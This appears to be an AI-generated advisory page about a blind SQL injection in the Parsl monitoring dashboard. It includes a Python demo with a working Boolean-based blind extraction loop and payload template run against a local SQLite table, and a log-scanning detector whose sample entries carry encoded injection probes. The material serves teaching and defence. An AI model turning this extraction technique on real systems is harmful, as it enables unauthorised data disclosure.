CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-F2MF-Q878-GH58 · CVSS 8.6

Parsl Tongue: SQL Injection in High-Performance Computing Visualization

Alon Barad, Software Engineer

Jan 6, 2026 · 6 min read

PoC Available

Executive Summary (TL;DR)

The parsl-visualize dashboard interpolates the workflow_id URL parameter into a raw SQL string instead of binding it as a query parameter. An unauthenticated attacker who can reach the dashboard can therefore inject arbitrary SQL into the affected query and, using Boolean-based blind injection (one true/false probe per character), read data the dashboard was never meant to return. The vulnerability affects every Parsl version before the fix committed on January 5, 2026 (commit 013a928461e70f38a33258bd525a351ed828e974); no tagged release is named on this page, so treat any install not built from that commit or later as affected.

Parsl, a parallel scripting library for Python widely used in academic and high-performance computing (HPC) environments, contains a high-severity (CVSS 8.6) SQL injection vulnerability in its monitoring dashboard. The flaw lets unauthenticated attackers manipulate database queries through the visualization interface, potentially exposing sensitive workflow metadata and environment configurations. The CVSS vector below (C:H/I:L/A:L) reflects that the main risk is data disclosure, with limited integrity and availability impact; exploitation requires only that the dashboard's listening port be reachable from the attacker's network.
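The following is an added example, not Parsl's code or the advisory's: the flawed pattern the summary describes, rebuilt against an in-memory SQLite table, next to the parameterized form that closes the hole, plus a Boolean-based blind extraction loop driven only by whether the "page" returned rows. The table name, columns, query text and sample rows are assumptions constructed for the demo; Parsl's actual monitoring schema and view code are not reproduced here.

```python
import sqlite3
import string


def build_db():
    """Constructed sample data standing in for a monitoring database.
    The schema is an assumption for the demo, not Parsl's real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE workflow (run_id TEXT PRIMARY KEY, workflow_name TEXT, "
        "user TEXT, host TEXT)"
    )
    conn.executemany(
        "INSERT INTO workflow VALUES (?, ?, ?, ?)",
        [
            ("3f1c2e0a-9b7d-4c1e-8a6f-2d5e7b9c0a11", "mc_sim", "alice", "login01.hpc.example"),
            ("7a0d4b3c-1e2f-4a5b-9c8d-6e7f8a9b0c1d", "genome_qc", "bob", "login02.hpc.example"),
        ],
    )
    return conn


def workflow_summary_vulnerable(conn, workflow_id):
    """Hypothetical reconstruction of the flawed pattern: the URL value is
    spliced into the SQL text, so a quote inside it rewrites the query."""
    sql = f"SELECT run_id, workflow_name FROM workflow WHERE run_id = '{workflow_id}'"
    return conn.execute(sql).fetchall()


def workflow_summary_fixed(conn, workflow_id):
    """Hardened form: the value travels as a bound parameter and is never
    parsed as SQL, whatever characters it contains."""
    sql = "SELECT run_id, workflow_name FROM workflow WHERE run_id = ?"
    return conn.execute(sql, (workflow_id,)).fetchall()


# Alphabet the extraction loop tries; covers hostnames and identifiers.
CHARSET = string.ascii_lowercase + string.digits + ".-_"


def blind_extract(oracle, subquery, max_len=40, charset=CHARSET):
    """Boolean-based blind extraction. `oracle(payload)` returns True when the
    endpoint behaves as for a matching workflow (here: at least one row comes
    back). One request per candidate character, one position at a time."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            # Breaks out of the quoted literal, ORs in the probe, and comments
            # out the closing quote the original query appends.
            payload = f"x' OR substr(({subquery}), {pos}, 1) = '{ch}' -- "
            if oracle(payload):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the secret value
    return recovered


if __name__ == "__main__":
    conn = build_db()
    secret = "SELECT host FROM workflow WHERE user = 'alice'"
    vuln = lambda p: len(workflow_summary_vulnerable(conn, p)) > 0
    fixed = lambda p: len(workflow_summary_fixed(conn, p)) > 0
    print("vulnerable endpoint leaks:", blind_extract(vuln, secret))
    print("fixed endpoint leaks:", repr(blind_extract(fixed, secret)))
```

Run the module to watch the vulnerable endpoint give up a hostname one character at a time while the parameterized endpoint leaks nothing. The fix is binding, not escaping: a bound value never reaches the SQL parser, so there is no quoting rule left to get wrong.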

Official Patches

Parsl: commit 013a928461e70f38a33258bd525a351ed828e974 fixing the SQL injection

Fix Analysis

Technical Appendix

CVSS Score: 8.6 / 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Affected Systems

  • Parsl (Python Parallel Scripting Library)
  • parsl-visualize dashboard

Affected Versions Detail

Product   Affected Versions                                          Fixed Version
Parsl     < commit 013a928461e70f38a33258bd525a351ed828e974           commit 013a928461e70f38a33258bd525a351ed828e974
Attribute            Detail
CWE ID               CWE-89 (SQL Injection)
Attack Vector        Network (Web Dashboard)
CVSS Score           8.6 (High)
Affected Component   parsl.monitoring.visualization
Exploit Status       PoC Available
Authentication       None Required

MITRE ATT&CK Mapping

T1190 Exploit Public-Facing Application (Initial Access)
T1059 Command and Scripting Interpreter (Execution)
CWE-89
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The software constructs all or part of an SQL command using an input that might be influenced by an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.

Known Exploits & Detection

Manual: Boolean-based blind injection via the workflow_id URL parameter
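As an added detection example (not from the advisory or the Parsl project), the following hunts access logs for the manual Boolean-based probing listed above. It assumes the dashboard is fronted by a reverse proxy writing combined-format access logs and that the affected views take the workflow id as a path segment under /workflow/ (ROUTE_RE is an assumption to adjust to the routes actually deployed); the log lines are constructed for the demo.

```python
import re
import urllib.parse
from collections import Counter

# Combined log format: ip ident user [timestamp] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) ([^ "]+)[^"]*" (\d{3})'
)
# Assumed route shape for the affected views: /workflow/<workflow_id>/...
ROUTE_RE = re.compile(r"^/workflow/([^/?]+)")
# Run ids are expected to be UUID-shaped; anything else in that slot is worth a look.
ID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.I
)
# Substrings typical of blind probing once the segment is percent-decoded.
SQLI_TOKENS = ("'", '"', " or ", " and ", "substr(", "--", "/*", "union ", "sleep(", "randomblob(")


def decode_segment(seg, rounds=2):
    """Percent-decode repeatedly so double-encoded payloads are caught too."""
    for _ in range(rounds):
        new = urllib.parse.unquote(seg)
        if new == seg:
            break
        seg = new
    return seg


def suspicious_requests(lines):
    """Return (client_ip, timestamp, decoded_workflow_id, status) for requests
    whose workflow_id is not a well-formed run id or carries SQL metacharacters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, path, status = m.groups()
        r = ROUTE_RE.match(path)
        if not r:
            continue
        wid = decode_segment(r.group(1))
        lowered = wid.lower()
        if not ID_RE.match(wid) or any(tok in lowered for tok in SQLI_TOKENS):
            hits.append((ip, ts, wid, status))
    return hits


def probing_clients(hits, threshold=3):
    """Blind extraction needs one near-identical request per candidate
    character, so clients over the threshold are the ones to escalate."""
    counts = Counter(ip for ip, *_ in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log lines for the demo (not captured from a real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Jan/2026:10:00:01 +0000] "GET /workflow/3f1c2e0a-9b7d-4c1e-8a6f-2d5e7b9c0a11/ HTTP/1.1" 200 5120',
    '10.0.0.5 - - [06/Jan/2026:10:00:02 +0000] "GET /static/style.css HTTP/1.1" 200 812',
    '198.51.100.7 - - [06/Jan/2026:10:01:10 +0000] "GET /workflow/x%27%20OR%20%271%27%3D%271/ HTTP/1.1" 200 9820',
    '198.51.100.7 - - [06/Jan/2026:10:01:11 +0000] "GET /workflow/x%27%20OR%20substr((SELECT%20host%20FROM%20workflow),1,1)%3D%27l%27%20--%20/ HTTP/1.1" 200 9820',
    '198.51.100.7 - - [06/Jan/2026:10:01:12 +0000] "GET /workflow/x%27%20OR%20substr((SELECT%20host%20FROM%20workflow),1,1)%3D%27m%27%20--%20/ HTTP/1.1" 200 4410',
    '203.0.113.9 - - [06/Jan/2026:10:02:00 +0000] "GET /workflow/not-a-uuid/ HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    found = suspicious_requests(SAMPLE_LOG)
    for ip, ts, wid, status in found:
        print(f"{ip} {ts} {status} workflow_id={wid!r}")
    print("clients to escalate:", probing_clients(found))
```

Blind extraction is noisy by nature: the same client issues one near-identical request per candidate character, and the Boolean signal shows up as identical status codes with two distinct response sizes (compare the 9820-byte and 4410-byte lines above). Tune ID_RE to the identifier format actually in use, or legitimate non-UUID ids will be flagged alongside the probes.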

Vulnerability Timeline

2026-01-05: Fix committed to master branch
2026-01-06: GitHub Advisory published

References & Sources

  • [1] GHSA Advisory
  • [2] Pull Request #4049

Attack Flow Diagram (interactive figure; not reproduced in text)